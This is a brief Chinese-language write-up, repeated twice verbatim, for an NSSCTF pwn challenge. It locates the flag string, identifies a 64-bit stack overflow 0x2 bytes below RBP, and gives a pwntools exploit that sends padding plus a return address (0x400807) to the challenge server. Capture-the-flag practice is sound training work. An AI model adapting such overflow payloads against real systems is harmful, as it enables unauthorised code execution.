shiift+F12查找字符串,发现flag.text跟踪
+
简单的栈溢出距离RBP 0X2并且是64位
所以exp为
from pwn import *
i = remote("node5.anna.nssctf.cn",28168)
address = 0x400807
payload = b'a'*(0x2+8) +p64(address)
i.sendline(payload)
i.interactive()
shiift+F12查找字符串,发现flag.text跟踪
+
简单的栈溢出距离RBP 0X2并且是64位
所以exp为
from pwn import *
i = remote("node5.anna.nssctf.cn",28168)
address = 0x400807
payload = b'a'*(0x2+8) +p64(address)
i.sendline(payload)
i.interactive()